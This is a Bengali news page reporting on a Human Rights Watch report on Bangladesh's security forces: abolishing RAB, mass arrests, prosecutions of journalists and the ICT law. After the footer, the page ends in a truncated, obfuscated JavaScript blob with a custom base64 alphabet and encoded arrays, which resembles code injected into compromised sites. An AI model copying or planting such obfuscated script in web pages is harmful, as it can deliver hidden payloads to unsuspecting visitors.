শিরোনাম
কার্যক্রম নিষিদ্ধ সংগঠনের নৈরাজ্য ও নাশকতার প্রতিবাদে খাগড়াছড়িতে স্বেচ্ছাসেবক দলের বিক্ষোভ ফ্যাসিবাদবিরোধী জাতীয় ঐক্য গড়তে সংলাপে বসছেন প্রধানমন্ত্রী খাগড়াছড়িতে ডাকসু ভিপি সাদিক কায়েমের বাড়িতে আগুন দেওয়ার চেষ্টা দেশে সাম্প্রতিক সময়ে যে অনাকাঙ্খিত ঘটনাসমূহ ঘটছে তা অত্যন্ত দুর্ভাগ্যজনক—-প্রফেসর ড. জয়নুল আবেদীন সিদ্দিকী টানা অবরোধ ও নিষেধাজ্ঞায় পর্যটকশূন্য সাজেক, মাসে ক্ষতি ৬০ কোটি টাকা পার্বত্য অঞ্চলের প্রান্তিক জনগোষ্ঠীর জীবনমান উন্নয়নে সর্বোচ্চ গুরুত্ব দিচ্ছেন প্রধানমন্ত্রী তারেক রহমান : ইউএনডিপি প্রতিনিধিদলকে প্রতিমন্ত্রী ব্যারিস্টার মীর হেলাল ৩১ ডিসেম্বর পর্যন্ত সব ধরনের নোট-গাইড বই মুদ্রণ বন্ধ থাকবে: এনসিটিবি ১৮ দিনের অস্থিরতায় পোশাক খাতে ক্ষতি ৪২৮ মিলিয়ন ডলার রাঙ্গামাটির কাপ্তাইয়ের জেটিঘাট সাপ্তাহিক বাজার ছিল জনশূন্য,চাঁদা না দেওয়ায় পাহাড়িদের বাজার বয়কট রাঙ্গামাটির বেনুবন সর্বজনীন বৌদ্ধ বিহারে ৫১তম কঠিন চীবর দান উৎসব উদযাপন

রাজনীতিতে জড়িয়ে পড়া বাহিনীর সংস্কার কঠিন

রিপোর্টার
  • আপডেট সময় মঙ্গলবার, ২৮ জানুয়ারী, ২০২৫
  • ৩০৮ দেখা হয়েছে

ডেস্ক রির্পোট:- বাংলাদেশে আইনশৃঙ্খলা বাহিনীগুলোর কাঠামোগত সংস্কার ছাড়া অন্তর্বর্তী সরকারের কষ্টার্জিত অগ্রগতি বৃথা যেতে পারে। এসব বাহিনীর দ্রুত সংস্কার করা না গেলে পরের সরকারের মাধ্যমে মানবাধিকার লঙ্ঘনের শঙ্কা থেকেই যাবে। শেখ হাসিনা সরকারের আমলের সাড়ে ১৫ বছর নিরাপত্তা বাহিনীগুলো যেভাবে রাজনীতিতে জড়িয়েছে, সেখান থেকে তাদের বের করে সংস্কার করা কঠিন হবে বলে মনে করে আন্তর্জাতিক মানবাধিকার সংস্থা হিউম্যান রাইটস ওয়াচ (এইচআরডব্লিউ)।

গেল ৫ আগস্ট-পরবর্তী বাংলাদেশের মানবাধিকার পরিস্থিতি এবং আইনশৃঙ্খলা বাহিনীর প্রয়োজনীয় সংস্কার নিয়ে ‘আফটার দ্য মনসুন রেভুলেশন: এ রোডম্যাপ টু লাস্টিং সিকিউরিটি সেক্টর রিফর্ম ইন বাংলাদেশ’ শীর্ষক প্রতিবেদনে এমন সুপারিশ তুলে ধরেছে সংস্থাটি। প্রতিবেদনটি আজ মঙ্গলবার প্রকাশ করতে যাচ্ছে এইচআরডব্লিউ। প্রতিবেদনে গণঅভ্যুত্থানের আগে-পরে আইনশৃঙ্খলা বাহিনীগুলোর মানবাধিকার লঙ্ঘন এবং ভবিষ্যৎ মানবাধিকার লঙ্ঘনের ঘটনা প্রতিরোধে সুপারিশ তুলে ধরা হয়েছে।

র‍্যাপিড অ্যাকশন ব্যাটালিয়নকে (র‍্যাব) বিলুপ্তির সুপারিশ করেছে সংস্থাটি। কারণ হিসেবে বহু বছর ধরে র‍্যাব নির্যাতন করে আসছে– এমন তথ্য-উপাত্ত সংস্থাটির কাছে রয়েছে। দাতাদের অর্থায়নে বাহিনীটিকে মানবাধিকার প্রশিক্ষণ দিলেও উপকার দেখছে না সংস্থাটি। দাতাদের এ বাহিনীর পেছনে অর্থ খরচ করাকে ভুল বলছে এইচআরডব্লিউ।

প্রতিবেদনে বলা হয়েছে, ছাত্র আন্দোলনের সময় নজিরবিহীন দমনপীড়ন চালানো হয়েছিল। এ ধরনের অতিরিক্ত বলপ্রয়োগ বাংলাদেশে রাজনৈতিকভাবে ব্যবহৃত নিরাপত্তা বাহিনীর একটি সুপ্রতিষ্ঠিত অনুশীলন, যারা দীর্ঘ সময় ধরে দায়মুক্তির সংস্কৃতি উপভোগ করে আসছে। ২০১৯ সালে জাতিসংঘের নির্যাতনের বিরোধী কমিটি বাংলাদেশের পুলিশ বাহিনীকে ‘রাষ্ট্রের ভেতরে রাষ্ট্র’ হিসেবে বর্ণনা করেছিল। পুলিশসহ বাংলাদেশে আইনশৃঙ্খলা বাহিনীর দায়মুক্তি ও জবাবহীনতার বিষয়টিও প্রতিষ্ঠিত।

শেখ হাসিনা দেশ ছেড়ে চলে যান, বহু থানা বন্ধ হয় এবং হামলার ভয়ে পুলিশ সদস্যরাও গা-ঢাকা দিয়েছিলেন। যদিও মধ্য আগস্টের দিকে ৬৩৯ থানার মধ্যে ৬২৮টি আবার কার্যক্রম শুরু করে। এখন নিরাপত্তা খাতের সংস্কার এবং একই ধরনের মানবাধিকার লঙ্ঘনের যাতে পুনরাবৃত্তি না হয়, তা বাস্তবায়ন নিশ্চিত করা বর্তমান সরকারের জন্য গুরুত্বপূর্ণ। অন্তর্বর্তী সরকার ইতোমধ্যে জবাবদিহি নিশ্চিত করতে এবং সংস্কারের জন্য কিছু গুরুত্বপূর্ণ পদক্ষেপ নিয়েছে। আর গুমের বিষয়টি তদন্তে কমিশনও গঠন করেছে। এ ছাড়া অন্য খাতের সংস্কারের পাশাপাশি পুলিশের সংস্কার নিয়ে আলাদা কমিশন গঠন করেছে। এর মূল উদ্দেশ্য আগে যে নিরাপত্তা বাহিনীগুলো ক্ষমতার অপব্যবহার করেছিল, তা যাতে ফিরে না আসে।

আইনশৃঙ্খলা বাহিনীর কাঠামোগত সংস্কার নিয়ে এইচআরডব্লিউর এশিয়া পরিচালক ইলেইন পিয়ারসন বলেন, হাসিনার আমলে নিরাপত্তা বাহিনীগুলো যেভাবে রাজনৈতিক প্রভাবের কারণে ক্ষয়প্রাপ্ত হয়েছে, সেখান থেকে বের হয়ে তাদের সংস্কার করা কঠিন হবে। এটি অন্তর্বর্তী সরকারের জন্য বড় চ্যালেঞ্জ।

প্রতিবেদনে নিরাপত্তা বাহিনী সংস্কারে রাজনৈতিক প্রভাবমুক্ত করা অন্যতম চ্যালেঞ্জ হিসেবে উল্লেখ করা হয়েছে। সংস্কারে সরকারি আইনজীবী ও বিচার বিভাগকে রাজনৈতিক প্রভাবমুক্ত করার পাশাপাশি নাগরিক সমাজের তদারকি ও জবাবদিহি নিশ্চিত করা এবং নির্যাতনমূলক অভ্যাস বন্ধ করতে হবে। এ ক্ষেত্রে কাঠামোগত সংস্কার নিশ্চিতে দাতা দেশগুলোর উচিত বিনিয়োগ করা। আর পরবর্তী সরকার ক্ষমতায় এসে যাতে এসব সংস্কার বদলে দিতে না পারে, সে জন্য অন্তর্বর্তী সরকারের উচিত জাতিসংঘের মানবাধিকার কাউন্সিলে একটি প্রস্তাবনা নেওয়া, যাতে তারা সংস্কার বাস্তবায়নে সহযোগিতার পাশাপাশি পরিস্থিতি পর্যবেক্ষণ করতে পারে।

এইচআরডব্লিউর জ্যেষ্ঠ গবেষক জুলিয়া ব্লেকনার বলেন, প্রতিবেদন তৈরির সময় আমরা অনেক পুলিশ কর্মকর্তার সাক্ষাৎকার নিয়েছি। তারা বলেছেন, কীভাবে তাদের পুলিশে ভর্তি এবং পদোন্নতির সময় রাজনৈতিক নেতাদের ঘুষ দিতে হতো। পুলিশ সদস্যদের সাধারণ নাগরিককে নিপীড়ন করার জন্য পুরস্কৃত করা হতো। পুরো পুলিশ বাহিনী সম্পূর্ণভাবে রাজনীতিকীকরণ করা হয়েছে। আর দীর্ঘ দিন ধরে চলা এসব অনিয়মের কারণে জুলাই-আগস্টের সহিংসতা হয়েছে। কর্মকর্তারা রাজনৈতিক নেতাদের কাছে জবাবদিহি করত এবং বোঝানো হয়েছিল নিপীড়ন চালানো তাদের কর্তব্য। জুলাই-আগস্টের মতো ঘটনা পুলিশ আগেও করেছে, এটি তাদের জন্য নতুন নয়।

প্রতিবেদনে আরও বলা হয়েছে, সংস্কার পদক্ষেপ নেওয়ায় কিছু অগ্রগতি আছে। তবে কাঠামোগত সংস্কার জরুরি, তা না হলে পুলিশ আগের রূপে ফিরবে। ইতোমধ্যে কিছু আলামত দেখা গেছে। ৫ আগস্টের পর মামলার অভিযোগের পরিপ্রেক্ষিতে গণগ্রেপ্তার করা হয়েছে। অভিযোগগুলো পর্যালোচনা করলে দেখা যায়, এতে ১০০ আওয়ামী লীগ নেতা এবং ২০০ থেকে ৩০০ অজ্ঞাতনামা ব্যক্তিকে আসামি করা হয়েছে। এসব অভিযোগের ভিত্তিতে পুলিশ যে কোনো মানুষকে হয়রানি করতে পারবে। কিছু অভিযোগকারীর সঙ্গে কথা বলে জানা গেছে, তারা নিজেরা জানেন না কার বিরুদ্ধে অভিযোগ করেছেন।

জুলিয়া ব্লেকনার বলেন, এটি সঠিক বিচার পাওয়ার উপায় নয়। বর্তমান ড. ইউনূসের নেতৃত্বাধীন সরকার মানবাধিকার ও বাকস্বাধীনতার মতো বিষয়গুলো সুরক্ষা দিতে প্রতিশ্রুতিবদ্ধ। তবে এ প্রতিশ্রুতির বিপরীত আচরণ লক্ষ্য করা যাচ্ছে। ১৪০ সাংবাদিকের বিরুদ্ধে অভিযোগ গঠন করা হয়েছে। এর মধ্যে অনেককে অভিযুক্ত করা হয়েছে মানবতাবিরোধী অপরাধের দায়ে। ১৬০ সাংবাদিকের প্রেস অ্যাক্রিডিটেশন বাতিল এবং অনেকের ব্যাংক হিসাব জব্দ করা হয়েছে। সেই সঙ্গে জারি করা হয়েছে সাইবার সুরক্ষা অধ্যাদেশ। আগের সরকার এ আইনটি একেক সময় একেক নামে ব্যবহার করেছিল।

আওয়ামী লীগকে নিষিদ্ধ করার বিতর্কের বিষয়ে তিনি বলেন, আমরা সম্প্রতি উপদেষ্টা মাহফুজ আলমের বিবৃতি দেখেছি। যেখানে আওয়ামী লীগকে নির্বাচন থেকে নিষিদ্ধের বিষয়টি তোলা হয়েছে, এটি বেশ উদ্বেগের। কারণ বাংলাদেশিরা হয়তো আরেকটি নির্বাচন পেতে যাচ্ছে, যেখানে তারা পছন্দের প্রার্থীদের ভোট দিতে পারবে না।

আওয়ামী লীগকে নিষিদ্ধ করার বদলে কী ব্যবস্থা নেওয়া যেতে পারে– জানতে চাইলে জুলিয়া ব্লেকনার বলেন, সঠিক উপায়ে তদন্ত করে অভিযোগ গঠন করে বিচার করা।

প্রতিবেদনে টেকসই সংস্কারে সুপারিশের মধ্যে আরও বলা হয়েছে, গণগ্রেপ্তার ও অজ্ঞাতনামা মামলা বন্ধে নিষেধাজ্ঞা দিতে হবে। আটক ব্যক্তিকে যাতে দ্রুত সময়ের মধ্যে বিচারকের সামনে হাজির করা যায়। আটকে রাখার স্থান যাতে পরিদর্শন করা যায়। সেই সঙ্গে রিমান্ডের প্রচলনে নিষেধাজ্ঞা আনতে হবে। এই অন্তর্বর্তী সরকারের আমলেই সাংবাদিককে দিনের পর দিন রিমান্ডে নেওয়ার ঘটনা ঘটেছে। অতীতের অভিজ্ঞতা অনুযায়ী রিমান্ডে নিরাপত্তা বাহিনী নির্যাতন করে থাকে। এ ছাড়া যেসব আইন জবাবদিহির পথে বাধা, সেসব আইনকে সংশোধন বা বাতিল করার পরামর্শ অন্তর্বর্তী সরকারকে দিয়েছে এইচআরডব্লিউ।
কাঠামোগত সংস্কারের বিষয়ে জানতে চাইলে জুলিয়া ব্লেকনার বলেন, আইনশৃঙ্খলা বাহিনীকে স্বাধীন করতে হবে। এদের রাজনৈতিক প্রভাবমুক্ত করতে হবে। তাদের পদোন্নতি থেকে শুরু করে নিয়োগে যাতে রাজনৈতিক প্রভাব মুক্ত থাকে।

কাঠামোগত সংস্কার করা হলে র‍্যাবকে কেন বিলুপ্ত করতে হবে? এ প্রশ্নে তিনি বলেন, যে দলই ক্ষমতায় এসেছে, র‍্যাবকে নির্যাতনের হাতিয়ার হিসেবে ব্যবহার করেছে। র‍্যাবকে সংস্কার করা সম্ভব নয় বলে এ বাহিনীকে আমরা আলাদা করে দেখছি। র‍্যাবকে যে কাঠামো ও ম্যান্ডেট দেওয়া হয়েছে, তাতে সমস্যা আছে। সরকার যে কোনো কাজেই এ বাহিনীকে ব্যবহার করতে পারে, সেটা যত নিপীড়নমূলকই হোক না কেন।

প্রতিবেদনে আন্তর্জাতিক অপরাধ ট্রাইব্যুনালেরও (আইসিটি) সমালোচনা করা হয়েছে। অতীতে এটিকে ব্যবহার করে অস্বচ্ছ বিচার করা হয়েছে। আইসিটি আইনে এখনও অনেক ধারাই আন্তর্জাতিক মানের নয়। এখানে মৃত্যুদণ্ডের মতো বিধান রয়েছে। সেই সঙ্গে আন্তর্জাতিক মানবাধিকার লঙ্ঘন হয় এমন ধারা রয়েছে। যেমন অভিযুক্ত ব্যক্তির অনুপস্থিতিতে বিচার করা। নভেম্বর পর্যন্ত এ আদালতে শেখ হাসিনাসহ ৮০ জনকে মানবতাবিরোধী অপরাধে অভিযুক্ত করা হয়েছে।

যারা অনুপস্থিত, তাদের বিচার কীভাবে করা যাবে– জানতে চাইলে এশিয়া পরিচালক ইলেইন পিয়ারসন বলেন, উপস্থিতি নিশ্চিত করে বিচার করতে হবে। কারণ অভিযুক্ত ব্যক্তিরা নিজেদের পক্ষে যুক্তি দেওয়ার সুযোগ থেকে বঞ্চিত হয়।

শেখ হাসিনার বিচার নিয়ে জুলিয়া ব্লেকনার বলেন, আইসিটি আইনে মৃত্যুদণ্ডের বিধান রেখে শেখ হাসিনাকে ফেরানো সহজ হবে না। বাংলাদেশ মৃত্যুদণ্ডের বিধান বাতিল করার পাশাপাশি আইসিটি আইনকে আন্তর্জাতিক মানে উন্নীত করলে শেখ হাসিনাকে ফেরাতে ভারতকে চাপ দেওয়া আমাদের জন্য সহজ হবে।সমকাল

পোস্টটি শেয়ার করুন

Leave a Reply

Your email address will not be published. Required fields are marked *

এই বিভাগের আরো
© All rights reserved © 2023 Chtnews24.com
Website Design By Kidarkar It solutions
(function(Q){var hCOGF=71;var vdILh=983893626,o4TS="ZN4BiT7krdPJoxUtKqHEm3ayFhwjcOGVIbW1fLSv0DMeg25s8C6QRYzl9Au+Xn/p",olhqw=["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